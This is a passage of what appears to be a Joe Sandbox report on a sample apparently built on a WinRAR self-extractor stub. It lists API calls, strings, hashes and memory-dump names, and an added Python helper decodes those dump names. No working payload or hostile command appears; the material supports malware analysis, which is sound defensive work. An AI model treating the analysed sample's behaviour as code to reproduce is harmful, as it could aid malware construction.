• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
• String ID: csm$csm$csm
• API String ID: 322700389-393685449
• Opcode ID: 2368bd18ec839c4555c2eabd836cd37243e0671de94dca2cd1ccd7ec0565f8d0
• Instruction ID: a64f6239710574eb7b02041bd53fa8c4a27d03d0c37bca4057211ba1895f5e05
• Opcode Fuzzy Hash: 2368bd18ec839c4555c2eabd836cd37243e0671de94dca2cd1ccd7ec0565f8d0
• Instruction Fuzzy Hash: 12B12871900219EFCF25FFA8C8819AEBBB5FF14310F18455AF815AB222D735DA51CB92
APIs
• __EH_prolog.LIBCMT ref: 00876FAA
• _wcslen.LIBCMT ref: 00877013
• _wcslen.LIBCMT ref: 00877084
  • Part of subcall function 00877A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877AAB
  • Part of subcall function 00877A9C: GetLastError.KERNEL32 ref: 00877AF1
  • Part of subcall function 00877A9C: CloseHandle.KERNEL32(?), ref: 00877B00
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Similarity
• API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
• API String ID: 3122303884-3508440684
• Opcode ID: 2cded3dda93089f22b6a56d0fb8c809eacd68f5ed6d7ed60b3b879439921c413
• Instruction ID: 5632ea7f56c0a5543d51cb1f8af3e9c3832902ec0a0dc210e4624a23f1b741c5
• Opcode Fuzzy Hash: 2cded3dda93089f22b6a56d0fb8c809eacd68f5ed6d7ed60b3b879439921c413
• Instruction Fuzzy Hash: 464107B1D087446AEF21E7788C82BEE736CFF15304F008455FA59E6186D674DA44C722
APIs
  • Part of subcall function 00871316: GetDlgItem.USER32(00000000,00003021), ref: 0087135A
  • Part of subcall function 00871316: SetWindowTextW.USER32(00000000,008A35F4), ref: 00871370
• EndDialog.USER32(?,00000001), ref: 0088B610
• SendMessageW.USER32(?,00000080,00000001,?), ref: 0088B637
• SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0088B650
• SetWindowTextW.USER32(?,?), ref: 0088B661
• GetDlgItem.USER32(?,00000065), ref: 0088B66A
• SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0088B67E
• SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0088B694
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Similarity
• API ID: MessageSend$Item$TextWindow$Dialog
• String ID: LICENSEDLG
• API String ID: 3214253823-2177901306
• Opcode ID: 0d9332c8f56de6a052d7d87d9e5b7457a8ad99dd8c480be68a82ff5d96b39598
• Instruction ID: d2810beb8d495ce7ec45fe3df6b808867cc806e50f853abe649ae76bba187ef2
• Opcode Fuzzy Hash: 0d9332c8f56de6a052d7d87d9e5b7457a8ad99dd8c480be68a82ff5d96b39598
• Instruction Fuzzy Hash: B7212732204219BBE611BF65EC49F3B3B7DFB96B40F050015F600E24A1EB629E01D732
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,B9A644FC,00000001,00000000,00000000,?,?,0087AF6C,ROOT\CIMV2), ref: 0088FD99
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0087AF6C,ROOT\CIMV2), ref: 0088FE14
• SysAllocString.OLEAUT32(00000000), ref: 0088FE1F
• _com_issue_error.COMSUPP ref: 0088FE48
• _com_issue_error.COMSUPP ref: 0088FE52
• GetLastError.KERNEL32(80070057,B9A644FC,00000001,00000000,00000000,?,?,0087AF6C,ROOT\CIMV2), ref: 0088FE57
• _com_issue_error.COMSUPP ref: 0088FE6A
• GetLastError.KERNEL32(00000000,?,?,0087AF6C,ROOT\CIMV2), ref: 0088FE80
• _com_issue_error.COMSUPP ref: 0088FE93
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Similarity
• API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
• String ID:
• API String ID: 1353541977-0
• Opcode ID: 5087ad2fea6828b5041eeaaedce6bf22dd50cffe6b9cd9f373824efa50ff7290
• Instruction ID: 3a44da3ef05ed6cc7cca44ae1f9f958703d132e206b99cfaaca8cdd39c2e181a
• Opcode Fuzzy Hash: 5087ad2fea6828b5041eeaaedce6bf22dd50cffe6b9cd9f373824efa50ff7290
• Instruction Fuzzy Hash: 0A41F971A00219ABDB10FF68CC45BAEBBA8FF49710F144239FA15EB652D7749900C7E5
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Similarity
• API ID: H_prolog
• String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
• API String ID: 3519838083-3505469590
• Opcode ID: 62af7aa82faadb8bc87acd33392e3543c4ff951ce053397b275acd962ffe8666
• Instruction ID: 0479cf32676450b93f891737480753b8a75a14dc30b394ef767ba0f7d21687a9
• Opcode Fuzzy Hash: 62af7aa82faadb8bc87acd33392e3543c4ff951ce053397b275acd962ffe8666
• Instruction Fuzzy Hash: D9718C71A00619AFEB14DFA4CC95AAEB7B9FF89310B044159F416E76A0CB30AD01CB60
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00879387
                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 008793AA
                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 008793C9
                                                                                                                                                                                                      • Part of subcall function 0087C29A: _wcslen.LIBCMT ref: 0087C2A2
                                                                                                                                                                                                      • Part of subcall function 00881FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0087C116,00000000,.exe,?,?,00000800,?,?,?,00888E3C), ref: 00881FD1
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 00879465
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 008794D4
                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00879514
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                                    • String ID: rtmp%d
                                                                                                                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                                                                                                                    • Opcode ID: d4f1f4e235ad32595e0ed51368dcb4dfbd5e2cf9ecf362d382594f83aeb1f0f6
                                                                                                                                                                                                    • Instruction ID: 503772ffb51ef97ed82e12eac13443870e569b5b927b230dada554ab191fc181
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4f1f4e235ad32595e0ed51368dcb4dfbd5e2cf9ecf362d382594f83aeb1f0f6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7741357190026866DF61EBA4CC45DDE737CFF55380F0088A5F68DE3156DA38CB898B61
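The "Memory Dump Source" entries above repeat the same seven dotted dump names for every function, and reading them by hand is slow. The following is an added Python helper written for this page; it is not part of the Joe Sandbox report and not code from the analysed sample. It assumes (inferred from the names on this page, not documented here) that the dotted fields are: process index, run, dump id, base address, page protection, a flag, memory type, and file index. The PAGE_* and MEM_* values are the standard Windows constants from winnt.h. Region sizes are not given in the report, so each region is assumed to extend up to the next dump's base address; the seven names below are copied from the report.

```python
"""Decode Joe Sandbox memory-dump file names into readable region records.

Added example for this page, not part of the report or the sample.
Field order (process, run, dump_id, base, protect, flag, memtype, index)
is an ASSUMPTION inferred from the names listed in the report.
"""
import bisect
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Page-protection constants from winnt.h (low byte of the Protect value).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Modifier bits that can be OR-ed onto the base protection.
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
# MEMORY_BASIC_INFORMATION.Type values.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<flag>[0-9A-Fa-f]{8})\."
    r"(?P<memtype>[0-9A-Fa-f]{8})\.(?P<index>[0-9A-Fa-f]{8})\.sdmp$"
)

# Dump names as they appear in the report above.
REPORT_DUMPS = [
    "00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp",
]


@dataclass(frozen=True)
class DumpRegion:
    base: int
    protection: str
    executable: bool
    writable: bool
    mem_type: str
    name: str


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split one dump file name and decode its protection and memory type."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    protect = int(m["protect"], 16)
    base_prot = PAGE_PROTECTION.get(protect & 0xFF, f"0x{protect & 0xFF:02x}")
    mods = [label for bit, label in PAGE_MODIFIERS.items() if protect & bit]
    return DumpRegion(
        base=int(m["base"], 16),
        protection="|".join([base_prot] + mods),
        executable=bool(protect & 0xF0),  # PAGE_EXECUTE* variants are 0x10..0x80
        writable=bool(protect & 0xCC),    # READWRITE / WRITECOPY variants
        mem_type=MEM_TYPE.get(int(m["memtype"], 16), m["memtype"]),
        name=name,
    )


class RegionMap:
    """Answer 'which dump holds this address?' for the API refs in the report."""

    def __init__(self, regions: Iterable[DumpRegion]):
        self.regions = sorted(regions, key=lambda r: r.base)
        self._bases = [r.base for r in self.regions]

    def region_for(self, addr: int) -> Optional[DumpRegion]:
        # ASSUMPTION: a region extends to the next dump's base (sizes not reported).
        i = bisect.bisect_right(self._bases, addr) - 1
        return self.regions[i] if i >= 0 else None

    def executable(self) -> List[DumpRegion]:
        return [r for r in self.regions if r.executable]


def build_report_map() -> RegionMap:
    return RegionMap(parse_sdmp_name(n) for n in REPORT_DUMPS)


def summarize(rmap: RegionMap) -> List[str]:
    """One line per region: base, protection, type, and a CODE/DATA tag."""
    return [
        f"{r.base:#010x}  {r.protection:<24}{r.mem_type:<12}{'CODE' if r.executable else 'DATA'}"
        for r in rmap.regions
    ]


if __name__ == "__main__":
    rmap = build_report_map()
    print("\n".join(summarize(rmap)))
    # Locate a few of the API refs listed in the report.
    for ref in (0x008793C9, 0x0089F6CF, 0x00892937):
        region = rmap.region_for(ref)
        print(f"ref {ref:#010x} -> dump base {region.base:#x} ({region.protection})")
```

Run against the seven names on this page, only the 0x871000 dump is PAGE_EXECUTE_READ, so that is the one to load in a disassembler; every API ref in the listings above (0x0087xxxx through 0x0089xxxx) falls inside it. The 0x8AE000, 0x8B5000 and 0x8D2000 dumps are PAGE_READWRITE, which is where runtime-populated strings and configuration are normally found, and all seven are MEM_IMAGE, matching the report's "based on PE: true".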
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 0088122E
                                                                                                                                                                                                      • Part of subcall function 0087B146: GetVersionExW.KERNEL32(?), ref: 0087B16B
                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00881251
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00881263
                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00881274
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00881284
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00881294
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 008812CF
                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 00881379
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1247370737-0
                                                                                                                                                                                                    • Opcode ID: 8e6a3af982f9dfe213b254f07f625a9978a6eebfe87dd968c7c8b30374d8d38c
                                                                                                                                                                                                    • Instruction ID: a522f53eb27029f07e8b8e334b71632af30c84b0c909ec7c2ebdc89706b6edef
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e6a3af982f9dfe213b254f07f625a9978a6eebfe87dd968c7c8b30374d8d38c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1241E5B1508305AFD710EF65C88496BFBE9FB89714F00892EF596C2610E738E649CB62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 00872536
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                      • Part of subcall function 008805DA: _wcslen.LIBCMT ref: 008805E0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                                                                                                                    • Opcode ID: 6883a4f113d0a6cbb9b6bf74d8cfe3989ca0c07fc3c969f38daab5fbac613246
                                                                                                                                                                                                    • Instruction ID: 43f2eb5c36574deda654b6d82a08863cc850431daddc121b4153b76c18c286a9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6883a4f113d0a6cbb9b6bf74d8cfe3989ca0c07fc3c969f38daab5fbac613246
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37F113716042409BDB25EF288495BBA7799FB90300F08857DED8EDB28BCB65C9498763
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                                                                                    • API String ID: 176396367-3568243669
                                                                                                                                                                                                    • Opcode ID: 5ef2eaf5754a0c4c00646f6441d2930d6c35053473d7f5b525a4afbe810f450f
                                                                                                                                                                                                    • Instruction ID: b375b202fdf512d3c04801ca47f703329d9472d0bd80c177159cae901ee2885f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ef2eaf5754a0c4c00646f6441d2930d6c35053473d7f5b525a4afbe810f450f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE51266674032395DB30BA29981177673E4FFA1790F6D042AFDC1DB2C1FBA58C818369
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0089FE02,00000000,00000000,00000000,00000000,00000000,0089529F), ref: 0089F6CF
                                                                                                                                                                                                    • __fassign.LIBCMT ref: 0089F74A
                                                                                                                                                                                                    • __fassign.LIBCMT ref: 0089F765
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0089F78B
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0089FE02,00000000,?,?,?,?,?,?,?,?,?,0089FE02,00000000), ref: 0089F7AA
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0089FE02,00000000,?,?,?,?,?,?,?,?,?,0089FE02,00000000), ref: 0089F7E3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                    • Opcode ID: ed8c8a164c2bdf35e0dc740724ef2b7bdd52c698de9c0bfbf069719eeca5f85c
                                                                                                                                                                                                    • Instruction ID: 2db243462a5c8a98a17710ec3ac4a2129f54d68b9f61fe57a6f563b5f1a3c97a
• Opcode Fuzzy Hash: ed8c8a164c2bdf35e0dc740724ef2b7bdd52c698de9c0bfbf069719eeca5f85c
• Instruction Fuzzy Hash: F451A4B1900249AFDF14DFA8DC45AEEFBF4FF09300F18416AE655E7252D630AA41CBA1
APIs
• _ValidateLocalCookies.LIBCMT ref: 00892937
• ___except_validate_context_record.LIBVCRUNTIME ref: 0089293F
• _ValidateLocalCookies.LIBCMT ref: 008929C8
• __IsNonwritableInCurrentImage.LIBCMT ref: 008929F3
• _ValidateLocalCookies.LIBCMT ref: 00892A48
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 9885c6efad136d0ff52a2c7515adc084f65395bd0da6f2c07f096ad7477a7742
• Instruction ID: 9ab293f59086ae97aaefb920aafdc6cb209f47855c0d21e8230036d2480e5c78
• Opcode Fuzzy Hash: 9885c6efad136d0ff52a2c7515adc084f65395bd0da6f2c07f096ad7477a7742
• Instruction Fuzzy Hash: E9419F34A00218AFCF10EF68C885A9EBFF5FF45324F188165E815EB792D7319A45CB91
APIs
• ShowWindow.USER32(?,00000000), ref: 00889EEE
• GetWindowRect.USER32(?,00000000), ref: 00889F44
• ShowWindow.USER32(?,00000005,00000000), ref: 00889FDB
• SetWindowTextW.USER32(?,00000000), ref: 00889FE3
• ShowWindow.USER32(00000000,00000005), ref: 00889FF9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: Window$Show$RectText
• String ID: RarHtmlClassName
• API String ID: 3937224194-1658105358
• Opcode ID: b264a32295b48559c1add431aac318faa754eac3995d6e20d975237b39fb1c5d
• Instruction ID: 855865e3ea6291d3419ab672e3cc80eb30ac776ba1afaf722c039f049cc8c8f4
• Opcode Fuzzy Hash: b264a32295b48559c1add431aac318faa754eac3995d6e20d975237b39fb1c5d
• Instruction Fuzzy Hash: 6741D131005311EFDB256F68DC48B2B7BA8FF48701F04465AF949DA156CB34DA04CB62
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: _wcslen
• String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
• API String ID: 176396367-3743748572
• Opcode ID: f5158780ce21165d21a0ef790f4d29cedde3dd06fee286fe9ae4ef3da36a56e3
• Instruction ID: e1139848fd8bc72f492c90e413f049408cd789946000325f9a954fb97555e3e5
• Opcode Fuzzy Hash: f5158780ce21165d21a0ef790f4d29cedde3dd06fee286fe9ae4ef3da36a56e3
• Instruction Fuzzy Hash: 0C31403264435596EE34BB549C42B7AB3A4FB90720F58441FF4D6D7280FB94AD5183A2
APIs
  • Part of subcall function 0089C868: _free.LIBCMT ref: 0089C891
• _free.LIBCMT ref: 0089C8F2
  • Part of subcall function 00898DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?), ref: 00898DE2
  • Part of subcall function 00898DCC: GetLastError.KERNEL32(?,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?,?), ref: 00898DF4
• _free.LIBCMT ref: 0089C8FD
• _free.LIBCMT ref: 0089C908
• _free.LIBCMT ref: 0089C95C
• _free.LIBCMT ref: 0089C967
• _free.LIBCMT ref: 0089C972
• _free.LIBCMT ref: 0089C97D
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
• Instruction ID: 6972b2502b68fdd3ae6e2d9f1c43de04e167bdf70f4ee059beb470eddaa8fdd3
